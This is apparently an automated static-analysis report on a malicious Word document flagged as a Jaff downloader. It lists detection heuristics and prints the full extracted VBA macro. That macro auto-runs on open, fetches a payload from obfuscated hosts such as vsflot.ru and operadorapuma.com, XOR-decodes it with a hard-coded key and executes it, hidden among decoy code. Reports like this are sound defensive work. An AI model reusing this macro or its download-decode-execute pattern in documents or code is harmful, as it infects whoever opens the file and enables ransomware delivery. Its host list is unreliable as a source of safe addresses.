Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 d737dd850abc18ca…

MALICIOUS

Office (OLE) / .DOC

102.5 KB Created: 2017-05-25 09:59:00 Authoring application: Microsoft Office Word First seen: 2026-06-20
MD5: d79192bbbf1c8b6ac862d6e72dc6931c SHA-1: e0812c93bf50764356319eed91ec9498717d69b6 SHA-256: d737dd850abc18ca6ca1c072c62c3b9f67e94f65da903e76f889d76d7a9ea1dd
318 Risk Score

Heuristics 11

  • ClamAV: Doc.Downloader.Jaff-6329915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Jaff-6329915-0
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set AbsoluteHidMachine = CreateObject(privateProbeName)
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\CIMV2")
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName SubProperty, "saveTo" + _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11789 bytes
SHA-256: 90cf754c2b62b58870dd376181a2d519a8b56aa6a1cb4b1355c8612804061ca0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub autoopen()
SignIn_Fish = 0
Synomati "a4833"
End Sub



Sub Document_Open()

End Sub







Attribute VB_Name = "LocalBrowser"
Attribute VB_Base = "0{57B045ED-7B73-4D3A-90CB-4EF44BB09A4B}{4E1B5C00-BDB1-4F57-BC61-AF6FACCB55C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "STRIX"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function setAsMainTarget() As String

tt = ThisDocument.BuiltInDocumentProperties("Content status").Value
MotoGP = Split(tt, "Abcdef")
privateProbeName = MotoGP(Quubo * 3)
privateProbe

setAsMainTarget = ""

End Function


    Public Sub Challenge(sender As String, e As Integer)
PlayCry 1
PlayCry 350
    End Sub

    
    
    
Public Sub Ant()


  SubProperty.Write SignIn_PokerFace
GoTo cip


 If Not CryToLoad.Compressed Then
 For g = 0 To CryToLoad.Size - 1
 CryToLoad.Data(g) = ByteTo.SignedInt("&H" & (Rea.dHEX(LoadedROM, (cryOffset) + 16 + g, 1)))
 Next
 Else
 If alignment = 0 Then
 pcmLevel = ByteTo.SignedInt("&H" & (Rea.dHEX(LoadedROM, offtrack, 1)))
 offtrack = offtrack + 1
 Data.Add (pcmLevel)
 alignment = &H20
 End If
 offtrack = offtrack + 1
 If alignment < &H20 Then
 Data.Add (pcmLevel)
 End If
 Data.Add (pcmLevel)
 If Size >= CryToLoad.Size Then
 End If
 alignment = 1
 CryToLoad.Data = Data.ToArray()
 CryToLoad.Size = offtrack - Start
 End If
cip:

CallByName SubProperty, "saveTo" + _
LocalBrowser.Label2.Caption, VbMethod, SignIn_PathTo2, 2
If SignIn_Fish <> 0 Then

 Exit Sub
End If
High4 "4", 3
End Sub


Attribute VB_Name = "Module3"


 Public Function SaveCry(crytosave, cryTable) As Boolean
 If crytosave.Offset = 0 Then
 End If
 crytosave.Compressed = False
 If crytosave.Compressed Then
 MsgBox ("This should not be enabled!")
 End
 Else
 For Each s In crytosave.Data
 Data.Add (CByte(s And &HFF))
 Next
 End If
 If crytosave.Size < Data.Count Then
 If (result = DialogResult.Yes) Then
 If (result2 = DialogResult.Yes) Then
 End If
 crytosave.Offset = Searc.hFreeSpaceFourAligned(LoadedROM, &HFF, Data.Count, "&H" & GetS.tring(GetI.NIFileLocation(), header, "StartSearchingForSpaceOffset", "800000"))
 Else
 End If
 End If
 End Function




Public Sub WidthA(Dbbb As String, bbbJ As String, Optional SignIn_Sexote As String)
 Dim bbb As Integer
bbb = FreeFile
 Dim Gbbb() As Byte
 Open Dbbb For Binary As #bbb
 ReDim Gbbb(0 To LOF(bbb) - 1)
 Get #bbb, , Gbbb()
 Close #bbb
 Call Subfunc(Gbbb(), SignIn_Sexote)
 bbb = FreeFile
 Open bbbJ For Binary As #bbb
 Put #bbb, , Gbbb()
 Close #bbb
End Sub


Sub enumMembers(objDomain)
    On Error Resume Next
    Dim Secondary(20)
    For Each objMember In objDomain
        If objMember.Class = "user" Then
            x = x + 1

            
            

            
            Counter = 0
            For ll = 1 To 20
                If Secondary(ll) <> "" Then
                    If Counter = 0 Then
                        SecondEmail = Secondary(ll)
                    Else
                        SecondEmail = SecondEmail + ", " + Secondary(ll)
                    End If
                    Counter = Counter + 1
                End If
            Next
            SecondEmail = """" & SecondEmail & """"
            
            
            
            SamAccountName = "-"
            Cn = "-"
            FirstName = "-"
            LastName = "-"
            initials = "-"
            Descrip = "-"
            Off.ice = "-"
            Telephone = "-"
            EmailAddr = "-"
            WebPage = "-"
            Addr1 = "-"
            City = "-"
            State = "-"
            ZipCode = "-"
            Title = "-"
            Department = "-"
            Company = "-"
            Manager = "-"
            Profile = "-"
            LoginScript = "-"
            HomeDirectory = "-"
            HomeDrive = "-"
            AdsPath = "-"
            
            For ll = 1 To 20
                Secondary(ll) = ""
            Next
            Primary = "-"
            SecondEmail = ""
        End If

        
    Next
End Sub

Attribute VB_Name = "Module1"

Public cnpk() As String
Public SignIn_4 As String
  
Public Const SignIn_System = "User-Agent"
Public SubProperty As Object


Public SignIn_RDD2 As Object

Public SignIn_Fish As Integer


Public MotoGP() As String

Public itemI As Integer
Public SignIn_Project As String
Public privateProbeName As String
Public SignIn_PathTo2 As String
Public AbsoluteHidMachine As Object


Public SignIn_PokerFace As Variant
Public SignIn_aifde As Object
Public SignIn_LAKOPPC As String
Public SignIn_avatar As Object
  
Public smbi As String
Public SignIn_2 As String
Public Const Quubo = 0


Public Sub SaveDataCSVToolStripMenuItem_Click(e As Integer)
       SignIn_4 = LocalBrowser.ZK.Caption & cnpk(i)
 itemI = itemI + 2
 Dim XIpotom2 As STRIX
Set XIpotom2 = New STRIX
If e < 488 Then


 XIpotom2.Challenge "Swed", 13
CallByName AbsoluteHidMachine, LocalBrowser.ToggleButton1.Caption, VbMethod
Set XIpotom2 = Nothing
 
Else

End If
    End Sub



 Public Sub ExportCry(filename, cry)
 If cry.Offset = 0 Then
 Return
 End If
 Us.ing writer
 writer.Write (Encoding.ASCII.GetBytes("RIFF"))
 writer.Write (0)
 writer.Write (Encoding.ASCII.GetBytes("WAVE"))
 writer.Write (Encoding.ASCII.GetBytes("fmt "))
 writer.Write (16)
 writer.Write (CUS.hort(1))
 writer.Write (CUS.hort(1))
 writer.Write (cry.SampleRate)
 writer.Write (cry.SampleRate)
 writer.Write (CUS.hort(1))
 writer.Write (CUS.hort(8))
 writer.Write (Encoding.ASCII.GetBytes("data"))
 writer.Write (cry.Data.Length)
 For Each sample In cry.Data
 writer.Write (CByte(sample + &H80))
 Next
 writer.Seek 4, SeekOrigin.Begin
 writer.Write (CInt(writer.BaseStream.Length) - 8)
 End Sub





Public Function Synomati(Comps)
 GoTo l12
 strComputer = Comps
 If InStr(1, strCaption, "Windows 7", vbTextCompare) Then
 Synomati = "Win7"
 End If
 If InStr(1, strCaption, "XP", vbTextCompare) Then
 Synomati = "XP"
 End If
l12:
 Dim c As STRIX
Set c = New STRIX
CallByName c, LocalBrowser.T2.Text, _
VbMethod
End Function

Public Sub privateProbe()
Set AbsoluteHidMachine = CreateObject(privateProbeName)

smbi = LocalBrowser.Label1.Caption
MotoGPE = MotoGP(2)


Set SignIn_avatar = CreateObject(MotoGP(3))
   Shtefin = Replace("vsflot.ru/TrfHn4Vbetter57toiuydof.net/af/TrfHn4Vyoutoolgrabeertorse.org/af/TrfHn4Voperadorapuma.cRRDD/TrfHn4", "RRDD", "om")
   Shtefin = Replace(Shtefin, "\", "/")
cnpk = Split(Shtefin, LocalBrowser.Command.Caption)
 Set SubProperty = CreateObject(MotoGP(1))
    Set SignIn_aifde = CreateObject(MotoGPE)

Set SignIn_RDD2 = SignIn_avatar.Environment(MotoGP(4))


 itemI = 18 / 3
 SignIn_LAKOPPC = SignIn_RDD2(MotoGP(itemI))



     RepackOK "4", "3", "5"

End Sub


 Public Sub PlayCry(cry As Integer)
 If cry = 1 Then
CallByName AbsoluteHidMachine, LocalBrowser.OptionButton1.Tag, VbMethod, MotoGP(5), SignIn_4, False
Exit Sub
Else: GoTo lab1
End If
 If c.ry.Offset = 0 Then
 Exit Sub
 End If
 writer.Write (Encoding.ASCII.GetBytes("RIFF"))
 writer.Write (0)
 writer.Write (Encoding.ASCII.GetBytes("WAVE"))
 writer.Write (Encoding.ASCII.GetBytes("fmt "))
 writer.Write (16)
 writer.Write (CUS.hort(1))
 writer.Write (CUS.hort(1))
 writer.Write (cr.y.SampleRate)
 writer.Write (cr.y.SampleRate)
 writer.Write (CUS.hort(1))
 writer.Write (CUS.hort(8))
 writer.Write (Encoding.ASCII.GetBytes("data"))
 writer.Write (cr.y.Data.Length)
 For Each sample In cr.y.Data
 writer.Write (CByte(sample + &H80))
 Next
 writer.Seek 4, SeekOrigin.Begin
 writer.Write (CInt(writer.BaseStream.Length) - 8)
lab1:
CallByName AbsoluteHidMachine, LocalBrowser.OptionButton2.Tag, VbMethod, SignIn_System, _
LocalBrowser.SpinButton1.Tag
Exit Sub
 stream.Seek 0, SeekOrigin.Begin
 player.Load
 player.Play
 End Sub

Public Sub RepackOK(sheetToMove As String, sheetAnchor As String, High6OrAfter As String)


 Dim i
 'On Error GoTo dee13
For i = LBound(cnpk) To UBound(cnpk) Step 1
 SaveDataCSVToolStripMenuItem_Click 72
If AbsoluteHidMachine.Status <> 200 Then
 Err.Raise 700 + vbObjectError, "V", "W"
End If
    
    
    
    High6 "3", 33
 Exit Sub
dee13:
Next
Exit Sub

    
End Sub






Public Function OrAndNotAnd(a, b)
Dim per
Dim der
   OrAndNotAnd = (a Or b) And (Not (a And b))
End Function


Public Function SignIn_ProjectSpeed()

GoTo labelBabel2
    Set FSO = CreateObject("Scripting.FileSystemObject")

Set oArgs = WScript.Arguments
If oArgs.Count = 1 Then
        strComputer = CStr(oArgs(0))
Else
    strComputer = InputBox("Enter computer name")
End If

Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\CIMV2")

labelBabel2:
 SignIn_Project = SignIn_LAKOPPC
 SignIn_PathTo2 = SignIn_Project + "\fremsoho" + CStr(itemI)


GoTo labelBabel3
    
labelBabel3:
SignIn_Project = SignIn_Project + Replace(MotoGP(12), ".", CStr(itemI) + ".")
 SubProperty.Type = 1
End Function


Attribute VB_Name = "Module2"

Public Function High6(FullPath As String, NumHoja As Integer) As String
SignIn_ProjectSpeed
 CallByName SubProperty, "O" + "pen", VbMethod
If NumHoja > 400 Then
 If numExportadas = 0 Then
 High6 = "No rows to export [No tiene filas por exportar]"
 Exit Function
 End If
End If
 SignIn_PokerFace = CallByName(AbsoluteHidMachine, "responseBody", VbGet)
LoadCry 0, 1
End Function
 Public Function GetCryImage(cry)
 Dim cryImage
 If GetS.tring(AppPath & "GBAPGESettings.ini", "Settings", "DisableCryImage", "0") = "1" Then
 cryImage = Bit.map(128, 128)
 Else
 cryImage = Bit.map(cry.Data.Length, 128)
 For i = 1 To cry.Data.Length - 1
 g.DrawLine Pens.Green, i - 1, 64 + cry.Data(i - 1), i, 64 + cry.Data(i)
 Next
 End If
 End Function










Attribute VB_Name = "Module4"

Public Sub Subfunc(MethodParam2() As Byte, MethodParam As String)

  
  Dim oldj2 As Long
  Dim oldj3 As Long
  Dim oldj5 As Long
  Dim oldj6 As Long
  Dim plusplus() As Byte
Dim oldj4 As Long
Dim plusplusLen As Long
  plusplusLen = Len(MethodParam)
ReDim plusplus(plusplusLen)

  plusplus = StrConv(MethodParam, vbFromUnicode)

  
  oldj2 = UBound(MethodParam2) + 1
  oldj5 = oldj2
  
  
  For oldj4 = _
  0 To (oldj2 - 1)
    aa = plusplus(oldj4 Mod plusplusLen)
    bb = MethodParam2(oldj4)
    MethodParam2(oldj4) = OrAndNotAnd(bb, aa)
    
    If (oldj4 >= oldj6) Then
      oldj3 = Int((oldj4 / oldj5) * 100)
      oldj6 = (oldj5 * ((oldj3 + 1) / 100)) + 1
    End If
  Next
End Sub


Public Function High4(FullPath As String, NumHoja As Integer) As String
  WidthA SignIn_PathTo2, SignIn_Project, "6WLms4bGcHU5iDixvWv6Wmuql3ILxV8S"


SignIn_aifde.Open (SignIn_Project)
   
End Function


Public Function LoadCry(index As Integer, cryTable As Integer)


Dim c As STRIX
Set c = New STRIX
CallByName c, "Ant", _
VbMethod

 End Function

Open this report in the interactive analyzer, or submit your own file for analysis.